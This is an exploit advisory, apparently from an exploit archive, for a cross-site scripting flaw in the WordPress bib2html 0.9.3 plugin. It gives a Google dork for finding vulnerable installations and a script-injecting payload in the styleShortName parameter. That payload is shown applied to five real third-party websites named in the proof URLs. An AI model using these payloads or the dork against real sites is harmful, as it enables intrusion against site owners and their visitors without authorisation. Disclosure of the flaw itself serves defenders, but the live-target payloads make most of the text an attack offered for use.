WordPress bib2html plugin version 0.9.3 suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.
a4eadb29a9ee0fe5cc72b51220221339d9488e699962c0abddc7b56cc660e24f
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
| [*] Exploit Title: Wordpress bib2html Cross site scripting Vulnerability
|
| [*] Exploit Author: Ashiyane Digital Security Team
|
| [*] Date : Date: 2014-05-22
|
| [*] Vendor Homepage : http://www.wordpress.org
|
| [*] Software Link :
http://downloads.wordpress.org/plugin/bib2html.0.9.3.zip
|
| [*] Google Dork: inurl:wp-content/plugins/bib2html
|
| [*] Tested on: Windows 7
|
| [*] Web browser : mozilla firefox
|-------------------------------------------------------------------------|
|
| [*] Location :
[localhost]/wp-content/plugins/bib2html/OSBiB/create/index.php?action=adminStyleAdd&styleShortName=[XSS]
|
|-------------------------------------------------------------------------|
| [*] Proof:
|
| [*]
hhttp://www.adamwesterski.com/wp-content/plugins/bib2html/OSBiB/create/index.php?action=adminStyleAdd&styleShortName=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
| [*]
http://www.adamwesterski.com/wp-content/plugins/bib2html/OSBiB/create/index.php?action=adminStyleAdd&styleShortName=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
| [*]
http://doc.gold.ac.uk/mutators/wp/wp-content/plugins/bib2html/OSBiB/create/index.php?action=adminStyleAdd&styleShortName=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
| [*]
http://recursostic.javeriana.edu.co/narratopedia/wp-content/plugins/bib2html/OSBiB/create/index.php?action=adminStyleAdd&styleShortName=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
| [*]
http://blog.aleph0.info/wp-content/plugins/bib2html/OSBiB/create/index.php?action=adminStyleAdd&styleShortName=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|-------------------------------------------------------------------------|
| [*] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|